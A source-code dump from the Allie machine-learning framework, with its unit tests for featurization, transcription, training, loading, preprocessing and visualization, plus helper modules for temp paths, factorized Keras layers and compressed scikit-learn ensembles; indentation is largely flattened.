b, msg = featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features)
self.assertEqual(True, b, msg)
def test_video_features(self, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir, default_video_features=default_video_features):
file='test_video.mp4'
sampletype='video'
default_features=default_video_features
b, msg = featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features)
self.assertEqual(True, b, msg)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_transcription(unittest.TestCase):
'''
TRANSCRIPTION API TESTS
tests the ability to transcribe across many
data types
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def setUp(self, prevdir=prevdir):
		# change settings.json to enable transcription for every file type
os.system('pip3 install opencv-python==3.4.2.16 opencv-contrib-python==3.4.2.16')
os.chdir(prevdir)
settings=json.load(open('settings.json'))
settings['transcribe_audio']=True
settings['transcribe_text']=True
settings['transcribe_image']=True
		settings['transcribe_video']=True
settings['transcribe_csv']=True
jsonfile=open('settings.json', 'w')
json.dump(settings, jsonfile)
jsonfile.close()
def tearDown(self, prevdir=prevdir, transcribe_audio=transcribe_audio, transcribe_text=transcribe_text, transcribe_image=transcribe_image, transcribe_video=transcribe_video, transcribe_csv=transcribe_csv):
		# change settings.json back to the default transcription settings
os.chdir(prevdir)
settings=json.load(open('settings.json'))
settings['transcribe_audio']=transcribe_audio
settings['transcribe_text']=transcribe_text
settings['transcribe_image']=transcribe_image
		settings['transcribe_video']=transcribe_video
settings['transcribe_csv']=transcribe_csv
jsonfile=open('settings.json','w')
json.dump(settings, jsonfile)
jsonfile.close()
# audio transcription
def test_audio_transcription(self, default_audio_transcript=default_audio_transcript, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir):
file='test_audio.wav'
sampletype='audio'
default_transcript=default_audio_transcript
b, msg = transcribe_file(train_dir, file, sampletype, default_transcript)
self.assertEqual(True, b, msg)
# text transcription
def test_text_transcription(self, default_text_transcript=default_text_transcript, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir):
file='test_text.txt'
sampletype='text'
default_transcript=default_text_transcript
b, msg = transcribe_file(train_dir, file, sampletype, default_transcript)
self.assertEqual(True, b, msg)
# image transcription
def test_image_transcription(self, default_image_transcript=default_image_transcript, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir):
file='test_image.png'
sampletype='image'
default_transcript=default_image_transcript
b, msg = transcribe_file(train_dir, file, sampletype, default_transcript)
self.assertEqual(True, b, msg)
# video transcription
def test_video_transcription(self, default_video_transcript=default_video_transcript, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir):
file='test_video.mp4'
sampletype='video'
default_transcript=default_video_transcript
b, msg = transcribe_file(train_dir, file, sampletype, default_transcript)
self.assertEqual(True, b, msg)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_training(unittest.TestCase):
'''
MODEL TRAINING API TESTS
Tests all available training scripts and compression abilities.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def setUp(self, prevdir=prevdir, training_scripts=training_scripts):
# change settings.json to test all model scripts
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
settings['default_training_script']=training_scripts
settings["default_text_features"] = ["nltk_features"]
settings['select_features']=False
settings['scale_features']=False
settings['reduce_dimensions']=False
settings['remove_outliers']=True
settings['visualize_data']=False
settings['clean_data']=False
settings['augment_data']=False
settings['model_compress']=False
jsonfile=open('settings.json', 'w')
json.dump(settings, jsonfile)
jsonfile.close()
def tearDown(self, textdir=textdir, prevdir=prevdir, training_scripts=training_scripts, clean_data=clean_data, augment_data=augment_data, model_compress=model_compress):
		# change settings.json back to the default settings
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
settings['default_training_script']=training_scripts
settings['clean_data']=clean_data
settings['augment_data']=augment_data
settings['model_compress']=model_compress
jsonfile=open('settings.json','w')
json.dump(settings, jsonfile)
jsonfile.close()
def test_training(self, cur_dir=cur_dir, train_dir=train_dir, model_dir=model_dir, clean_data=clean_data, augment_data=augment_data, test_dir=test_dir):
# use text model for training arbitrarily because it's the fastest model training time.
# note that the files here are already featurized to only test modeling capability (and not featurization or other aspects of the Models API)
os.chdir(train_dir)
shutil.copytree(test_dir+'/helpers/model_test/one', os.getcwd()+'/one')
shutil.copytree(test_dir+'/helpers/model_test/two', os.getcwd()+'/two')
os.chdir(model_dir)
# iterate through all machine learning model training methods
os.system('python3 model.py text 2 c onetwo one two')
os.chdir(train_dir)
shutil.rmtree('one')
shutil.rmtree('two')
# now find the model
os.chdir(textdir)
listdir=os.listdir()
b=False
# remove temporary files in the textdir
for i in range(len(listdir)):
if listdir[i].find('onetwo') >= 0:
b=True
# use shutil to remove a folder.
shutil.rmtree(listdir[i])
break
else:
os.remove(listdir[i])
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_loading(unittest.TestCase):
'''
LOADING API TESTS
	Note: we loop through the load directory until we find a sample whose
	prediction ends in 'audio.json' | 'text.json' | 'image.json' | 'video.json' | 'csv.json';
	this is because output files are renamed to avoid naming conflicts.
For example, if 'audio.wav' --> 'audio.json' and 'audio.mp4' --> 'audio.json',
both would have a conflicting name and would overwrite each other.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def setUp(self, prevdir=prevdir):
# change settings.json to test all model scripts
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
# set features for the right ML models
settings['default_audio_features']=['librosa_features']
settings['default_text_features']=['nltk_features']
settings['default_image_features']=['image_features']
settings['default_video_features']=['video_features']
jsonfile=open('settings.json', 'w')
json.dump(settings, jsonfile)
jsonfile.close()
def tearDown(self, default_audio_features=default_audio_features, default_text_features=default_text_features, default_image_features=default_image_features, default_video_features=default_video_features, default_csv_features=default_csv_features):
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
# set features back to what they were before.
settings['default_audio_features']=default_audio_features
settings['default_text_features']=default_text_features
settings['default_image_features']=default_image_features
settings['default_video_features']=default_video_features
settings['default_csv_features']=default_csv_features
jsonfile=open('settings.json','w')
json.dump(settings, jsonfile)
jsonfile.close()
def test_loadaudio(self, load_dir=load_dir, cur_dir=cur_dir, loadmodel_dir=loadmodel_dir):
filetype='audio'
testfile='test_audio.wav'
b, msg = model_predict(filetype, testfile, loadmodel_dir, load_dir)
self.assertEqual(True, b)
def test_loadtext(self, load_dir=load_dir, cur_dir=cur_dir, loadmodel_dir=loadmodel_dir):
filetype='text'
testfile='test_text.txt'
b, msg = model_predict(filetype, testfile, loadmodel_dir, load_dir)
self.assertEqual(True, b)
def test_loadimage(self, load_dir=load_dir, cur_dir=cur_dir, loadmodel_dir=loadmodel_dir):
filetype='image'
testfile='test_image.png'
b, msg = model_predict(filetype, testfile, loadmodel_dir, load_dir)
self.assertEqual(True, b)
def test_loadvideo(self, load_dir=load_dir, cur_dir=cur_dir, loadmodel_dir=loadmodel_dir):
filetype='video'
testfile='test_video.mp4'
b, msg = model_predict(filetype, testfile, loadmodel_dir, load_dir)
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_preprocessing(unittest.TestCase):
'''
PREPROCESSING API TESTS
Tests Allie's preprocessing functionality to reduce dimensionality,
select features, and scale features.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def setUp(self, prevdir=prevdir):
		# change settings.json to enable feature selection, scaling, and dimensionality reduction
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
# set features for the right ML models
settings['select_features']=True
settings['reduce_dimensions']=True
settings['scale_features']=True
settings['default_scaler']=["standard_scaler"]
settings['default_feature_selector']=["rfe"]
		settings['default_dimensionality_reducer']=["pca"]
settings['dimension_number']=20
settings['feature_number']=2
jsonfile=open('settings.json', 'w')
json.dump(settings, jsonfile)
jsonfile.close()
def tearDown(self, prevdir=prevdir, select_features=select_features, reduce_dimensions=reduce_dimensions, scale_features=scale_features, default_scaler=default_scaler, default_feature_selector=default_feature_selector, default_dimensionality_reducer=default_dimensionality_reducer, dimension_number=dimension_number, feature_number=feature_number):
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
# set features for the right ML models
settings['select_features']=select_features
settings['reduce_dimensions']=reduce_dimensions
settings['scale_features']=scale_features
settings['default_scaler']=default_scaler
settings['default_feature_selector']=default_feature_selector
settings['default_dimensionality_reducer']=default_dimensionality_reducer
settings['dimension_number']=dimension_number
settings['feature_number']=feature_number
jsonfile=open('settings.json','w')
json.dump(settings, jsonfile)
jsonfile.close()
def test_createtransformer(self, preprocessing_dir=preprocessing_dir, test_dir=test_dir):
# copy files into the train_dir
os.chdir(test_dir)
try:
shutil.copytree(test_dir+'/helpers/model_test/one', train_dir+'/one')
except:
shutil.rmtree(train_dir+'/one')
shutil.copytree(test_dir+'/helpers/model_test/one', train_dir+'/one')
try:
shutil.copytree(test_dir+'/helpers/model_test/two', train_dir+'/two')
except:
shutil.rmtree(train_dir+'/two')
shutil.copytree(test_dir+'/helpers/model_test/two', train_dir+'/two')
os.chdir(preprocessing_dir)
# call it using proper format
os.system('python3 transform.py text c onetwo one two')
# now that we have transformer test to see if it exists
if 'text_transformer' in os.listdir():
os.chdir('text_transformer')
listdir=os.listdir()
if 'c_onetwo_standard_scaler_pca_rfe.json' in listdir:
b=True
else:
b=False
else:
b=False
shutil.rmtree(train_dir+'/one')
shutil.rmtree(train_dir+'/two')
# feature select data
self.assertEqual(True, b)
def test_loadtransformer(self, test_dir=test_dir, preprocessing_dir=preprocessing_dir):
try:
shutil.copytree(test_dir+'/helpers/text_transformer', preprocessing_dir+'/text_transformer/')
except:
shutil.rmtree(preprocessing_dir+'/text_transformer/')
shutil.copytree(test_dir+'/helpers/text_transformer', preprocessing_dir+'/text_transformer/')
# now actually convert and load data with this transformer
os.chdir(preprocessing_dir+'/text_transformer/')
model=pickle.load(open('c_onetwo_standard_scaler_pca_rfe.pickle','rb'))
jsonfile=json.load(open('c_onetwo_standard_scaler_pca_rfe.json'))
sample=jsonfile['sample input X']
transformed_sample=jsonfile['sample transformed X']
newsize=model.transform(np.array(sample).reshape(1,-1))
# ---> FOR TESTING ONLY <----
# print(model)
# print(newsize)
# print(type(newsize))
# print(transformed_sample)
# print(type(transformed_sample))
if np.size(newsize[0]) == np.size(np.array(transformed_sample)):
b=True
else:
b=False
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_visualization(unittest.TestCase):
'''
VISUALIZATION API TESTS
Tests Allie's visualization API capabilities for classification problems.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_visualization(self, test_dir=test_dir, train_dir=train_dir, visualization_dir=visualization_dir):
# copy files into the train_dir
os.chdir(test_dir)
shutil.copytree(test_dir+'/helpers/model_test/one', train_dir+'/one')
shutil.copytree(test_dir+'/helpers/model_test/two', train_dir+'/two')
# now run the visualization
os.chdir(visualization_dir)
if 'visualization_session' in os.listdir():
shutil.rmtree('visualization_session')
os.system('python3 visualize.py text one two')
if 'visualization_session' in os.listdir():
os.chdir('visualization_session')
files=os.listdir()
if 'clustering' in files and 'feature_ranking' in files and 'model_selection' in files and 'classes.png' in files:
b=True
else:
b=False
else:
b=False
os.chdir(train_dir)
shutil.rmtree("one")
shutil.rmtree("two")
# visualize data (text data featurized)
self.assertEqual(True, b)
if __name__ == '__main__':
unittest.main()
```
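The module above already runs itself via `unittest.main()`; as a hedged convenience, the same suite can also be discovered and executed programmatically (assuming the file is saved as `unit_test.py` in the working directory):
```python
# Sketch: discover and run the Allie unit tests programmatically.
import unittest

suite = unittest.defaultTestLoader.discover('.', pattern='unit_test.py')
unittest.TextTestRunner(verbosity=2).run(suite)
```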
#### File: helpers/autokaggle/utils.py
```python
import os
import tempfile
import string
import random
def ensure_dir(directory):
"""Create directory if it does not exist."""
if not os.path.exists(directory):
os.makedirs(directory)
def temp_path_generator():
sys_temp = tempfile.gettempdir()
path = os.path.join(sys_temp, 'autokaggle')
return path
def rand_temp_folder_generator():
"""Create and return a temporary directory with the path name '/temp_dir_name/autokeras' (E:g:- /tmp/autokeras)."""
chars = string.ascii_uppercase + string.digits
size = 6
random_suffix = ''.join(random.choice(chars) for _ in range(size))
sys_temp = temp_path_generator()
path = sys_temp + '_' + random_suffix
ensure_dir(path)
return path
```
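A brief usage sketch for the path helpers above; the import path is an assumption based on the file location:
```python
# Hypothetical usage of the autokaggle path helpers defined above.
from autokaggle.utils import ensure_dir, temp_path_generator, rand_temp_folder_generator

base = temp_path_generator()            # e.g. /tmp/autokaggle
ensure_dir(base)                        # creates the directory only if missing
workdir = rand_temp_folder_generator()  # e.g. /tmp/autokaggle_AB12CD, already created
print(base, workdir)
```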
#### File: keras_compressor/keras_compressor/layers.py
```python
from keras import backend as K
from keras import activations, constraints, initializers, regularizers
from keras.engine import InputSpec, Layer
from keras.layers import Dense
from keras.utils import conv_utils
class FactorizedDense(Layer):
"""Just your regular densely-connected NN layer.
    This layer is based on `keras.layers.core.Dense` and behaves like it.
`FactorizedDense` implements the operation:
`output = activation(dot(dot(input, pre_kernel), post_kernel) + bias)`
where `activation` is the element-wise activation function
    passed as the `activation` argument, `pre_kernel` and `post_kernel` are weight matrices
    created by the layer, and `bias` is a bias vector created by the layer
(only applicable if `use_bias` is `True`).
Note: if the input to the layer has a rank greater than 2, then
it is flattened prior to the initial dot product with `pre_kernel`.
# Arguments
units: Positive integer, dimensionality of the output space.
components: Positive integer or None, the size of internal components.
            If given None, the output is calculated in the same manner as in the `Dense` layer.
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
pre_kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
post_kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
bias_initializer: Initializer for the bias vector
(see [initializers](../initializers.md)).
pre_kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
post_kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
bias_regularizer: Regularizer function applied to the bias vector
(see [regularizer](../regularizers.md)).
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
kernel_constraint: Constraint function applied to
the `kernel` weights matrix
(see [constraints](../constraints.md)).
bias_constraint: Constraint function applied to the bias vector
(see [constraints](../constraints.md)).
# Input shape
nD tensor with shape: `(batch_size, ..., input_dim)`.
The most common situation would be
a 2D input with shape `(batch_size, input_dim)`.
# Output shape
nD tensor with shape: `(batch_size, ..., units)`.
For instance, for a 2D input with shape `(batch_size, input_dim)`,
the output would have shape `(batch_size, units)`.
"""
target_layer_types = [Dense]
def __init__(self, units, components,
activation=None,
use_bias=True,
pre_kernel_initializer='glorot_uniform',
post_kernel_initializer='glorot_uniform',
bias_initializer='zeros',
pre_kernel_regularizer=None,
post_kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
pre_kernel_constraint=None,
post_kernel_constraint=None,
bias_constraint=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(FactorizedDense, self).__init__(**kwargs)
self.units = units
self.components = components
self.activation = activations.get(activation)
self.use_bias = use_bias
self.pre_kernel_initializer = initializers.get(pre_kernel_initializer)
self.post_kernel_initializer = initializers.get(post_kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.pre_kernel_regularizer = regularizers.get(pre_kernel_regularizer)
self.post_kernel_regularizer = regularizers.get(post_kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.pre_kernel_constraint = constraints.get(pre_kernel_constraint)
self.post_kernel_constraint = constraints.get(post_kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.input_spec = InputSpec(min_ndim=2)
self.supports_masking = True
def build(self, input_shape):
assert len(input_shape) >= 2
input_dim = input_shape[-1]
is_factorized = self.components is not None
if is_factorized:
shape = (input_dim, self.components)
else:
shape = (input_dim, self.units)
self.pre_kernel = self.add_weight(shape,
initializer=self.pre_kernel_initializer,
name='pre_kernel',
regularizer=self.pre_kernel_regularizer,
constraint=self.pre_kernel_constraint)
if not is_factorized:
self.post_kernel = None
else:
self.post_kernel = self.add_weight((self.components, self.units),
initializer=self.post_kernel_initializer,
                                               name='post_kernel',
regularizer=self.post_kernel_regularizer,
constraint=self.post_kernel_constraint)
if self.use_bias:
self.bias = self.add_weight((self.units,),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
self.input_spec = InputSpec(min_ndim=2, axes={-1: input_dim})
self.built = True
def call(self, inputs):
h = K.dot(inputs, self.pre_kernel)
if self.post_kernel is not None:
h = K.dot(h, self.post_kernel)
if self.use_bias:
h = K.bias_add(h, self.bias)
if self.activation is not None:
h = self.activation(h)
return h
def compute_output_shape(self, input_shape):
assert input_shape and len(input_shape) >= 2
assert input_shape[-1]
output_shape = list(input_shape)
output_shape[-1] = self.units
return tuple(output_shape)
def get_config(self):
config = {
'units': self.units,
'activation': activations.serialize(self.activation),
'components': self.components,
'use_bias': self.use_bias,
'pre_kernel_initializer': initializers.serialize(self.pre_kernel_initializer),
'post_kernel_initializer': initializers.serialize(self.post_kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'pre_kernel_regularizer': regularizers.serialize(self.pre_kernel_regularizer),
'post_kernel_regularizer': regularizers.serialize(self.post_kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'pre_kernel_constraint': constraints.serialize(self.pre_kernel_constraint),
'post_kernel_constraint': constraints.serialize(self.post_kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(FactorizedDense, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class FactorizedConv2DTucker(Layer):
"""2D convolution layer with tucker decomposition.
    This layer is based on `keras.layers.convolution.Conv2D` and behaves like it.
The difference is the kernel is factorized by tucker decomposition.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
# Arguments
filters: Integer, the dimensionality of the output space
            (i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
input_components: Integer or None, the number of components
of kernel for the input channel axis. If given None, the
factorization of input side is skipped.
output_components: Integer or None, the number of components
of kernel for the output channel axis. If given None, the
factorization of output side is skipped.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, width, height, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, width, height)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
pre_kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
post_kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
bias_initializer: Initializer for the bias vector
(see [initializers](../initializers.md)).
pre_kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
post_kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
bias_regularizer: Regularizer function applied to the bias vector
(see [regularizer](../regularizers.md)).
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
pre_kernel_constraint: Constraint function applied to the kernel matrix
(see [constraints](../constraints.md)).
kernel_constraint: Constraint function applied to the kernel matrix
(see [constraints](../constraints.md)).
post_kernel_constraint: Constraint function applied to the kernel matrix
(see [constraints](../constraints.md)).
bias_constraint: Constraint function applied to the bias vector
(see [constraints](../constraints.md)).
# Input shape
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
# Output shape
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
input_components=None,
output_components=None,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=True,
pre_kernel_initializer='glorot_uniform',
kernel_initializer='glorot_uniform',
post_kernel_initializer='glorot_uniform',
bias_initializer='zeros',
pre_kernel_regularizer=None,
kernel_regularizer=None,
post_kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
pre_kernel_constraint=None,
kernel_constraint=None,
post_kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(FactorizedConv2DTucker, self).__init__(**kwargs)
rank = 2
self.rank = rank
self.input_components = input_components
self.output_components = output_components
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.data_format = K.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, rank, 'dilation_rate')
self.activation = activations.get(activation)
self.use_bias = use_bias
self.pre_kernel_initializer = initializers.get(pre_kernel_initializer)
self.kernel_initializer = initializers.get(kernel_initializer)
self.post_kernel_initializer = initializers.get(post_kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.pre_kernel_regularizer = regularizers.get(pre_kernel_regularizer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.post_kernel_regularizer = regularizers.get(post_kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.pre_kernel_constraint = constraints.get(pre_kernel_constraint)
self.kernel_constraint = constraints.get(kernel_constraint)
self.post_kernel_constraint = constraints.get(post_kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.input_spec = InputSpec(ndim=rank + 2) # batch, H, W, C
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
if self.input_components is None:
input_components = input_dim
else:
input_components = self.input_components
if self.output_components is None:
output_components = self.filters
else:
output_components = self.output_components
kernel_shape = self.kernel_size + (input_components, output_components)
if self.input_components is None:
self.pre_kernel = None
else:
pre_kernel_shape = (1, 1) + (input_dim, self.input_components)
self.pre_kernel = self.add_weight(pre_kernel_shape,
initializer=self.pre_kernel_initializer,
name='pre_kernel',
regularizer=self.pre_kernel_regularizer,
constraint=self.pre_kernel_constraint)
self.kernel = self.add_weight(kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
if self.output_components is None:
self.post_kernel = None
else:
post_kernel_shape = (1, 1) + (self.output_components, self.filters)
self.post_kernel = self.add_weight(post_kernel_shape,
initializer=self.post_kernel_initializer,
name='post_kernel',
regularizer=self.post_kernel_regularizer,
constraint=self.post_kernel_constraint)
if self.use_bias:
self.bias = self.add_weight((self.filters,),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
# Set input spec.
self.input_spec = InputSpec(ndim=self.rank + 2,
axes={channel_axis: input_dim})
self.built = True
def call(self, inputs):
h = inputs
if self.pre_kernel is not None:
h = K.conv2d(
h,
self.pre_kernel,
strides=(1, 1),
padding='valid',
data_format=self.data_format,
dilation_rate=(1, 1),
)
h = K.conv2d(
h,
self.kernel,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
)
if self.post_kernel is not None:
h = K.conv2d(
h,
self.post_kernel,
strides=(1, 1),
padding='valid',
data_format=self.data_format,
dilation_rate=(1, 1),
)
outputs = h
if self.use_bias:
outputs = K.bias_add(
outputs,
self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
if self.data_format == 'channels_last':
space = input_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0],) + tuple(new_space) + (self.filters,)
if self.data_format == 'channels_first':
space = input_shape[2:]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0], self.filters) + tuple(new_space)
def get_config(self):
config = {
'input_components': self.input_components,
'output_components': self.output_components,
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'pre_kernel_initializer': initializers.serialize(self.pre_kernel_initializer),
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'post_kernel_initializer': initializers.serialize(self.post_kernel_initializer),
            'bias_initializer': initializers.serialize(self.bias_initializer),
'pre_kernel_regularizer': regularizers.serialize(self.pre_kernel_regularizer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'post_kernel_regularizer': regularizers.serialize(self.post_kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'pre_kernel_constraint': constraints.serialize(self.pre_kernel_constraint),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'post_kernel_constraint': constraints.serialize(self.post_kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(FactorizedConv2DTucker, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
custom_layers = {
'FactorizedConv2DTucker': FactorizedConv2DTucker,
'FactorizedDense': FactorizedDense,
}
```
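A minimal sketch of dropping these factorized layers into a model in place of the stock `Dense`/`Conv2D` layers; the sizes and component counts are illustrative and assume a Keras version compatible with the layer code above:
```python
# Illustrative model built from the factorized layers defined above.
from keras.models import Sequential
from keras.layers import Flatten
from keras_compressor.layers import FactorizedConv2DTucker, FactorizedDense

model = Sequential()
# Tucker-factorized convolution: 32 filters, 3x3 kernel, output-channel rank 16.
model.add(FactorizedConv2DTucker(32, (3, 3), input_components=None,
                                 output_components=16, activation='relu',
                                 input_shape=(28, 28, 1)))
model.add(Flatten())
# Low-rank dense layer: 10 output units through a 4-dimensional bottleneck.
model.add(FactorizedDense(10, components=4, activation='softmax'))
model.summary()
```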
#### File: scikit-small-ensemble/scikit_small_ensemble/scikit_ensemble.py
```python
import lz4 as zlib
import tempfile
import joblib
import os
try:
import _pickle as pickle
except ImportError:
try:
import cPickle as pickle
except ImportError:
print('cPickle is not installed. Using the builtin pickle instead.')
import pickle
class CompressedEstimators(object):
def __init__(self, estimators, ratio):
self.cutoff = int(len(estimators) * ratio)
self.estimators = [
zlib.compress(pickle.dumps(x)) if i < self.cutoff else x
for i, x in enumerate(estimators)
]
def __getitem__(self, index):
estimator = self.estimators[index]
if index < self.cutoff:
return pickle.loads(zlib.decompress(estimator))
else:
return estimator
def __len__(self):
return len(self.estimators)
class DiskEstimators(object):
def __init__(self, estimators, ratio):
self.cutoff = int(len(estimators) * ratio)
self.saved_dir = tempfile.mkdtemp()
for i in range(self.cutoff):
joblib.dump(estimators[i], os.path.join(self.saved_dir, str(i)), compress=0)
self.estimators = [
os.path.join(self.saved_dir, str(i)) if i < self.cutoff else x
for i, x in enumerate(estimators)
]
def __getitem__(self, index):
estimator = self.estimators[index]
if index < self.cutoff:
return joblib.load(estimator, mmap_mode='r')
else:
return estimator
def __len__(self):
return len(self.estimators)
```
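A hedged sketch of applying the wrappers above to a fitted ensemble; whether `predict` works unchanged after swapping `estimators_` depends on the scikit-learn version:
```python
# Hypothetical usage: compress half of a fitted random forest's trees in memory.
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier

X, y = make_classification(n_samples=200, n_features=10, random_state=0)
forest = RandomForestClassifier(n_estimators=50, random_state=0).fit(X, y)

# Wrap the fitted trees; indexing transparently decompresses them on access.
forest.estimators_ = CompressedEstimators(forest.estimators_, ratio=0.5)
print(forest.predict(X[:5]))
```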
#### File: allie/training/model.py
```python
import os, sys, pickle, json, random, shutil, time, itertools, uuid, datetime, psutil, platform
import numpy as np
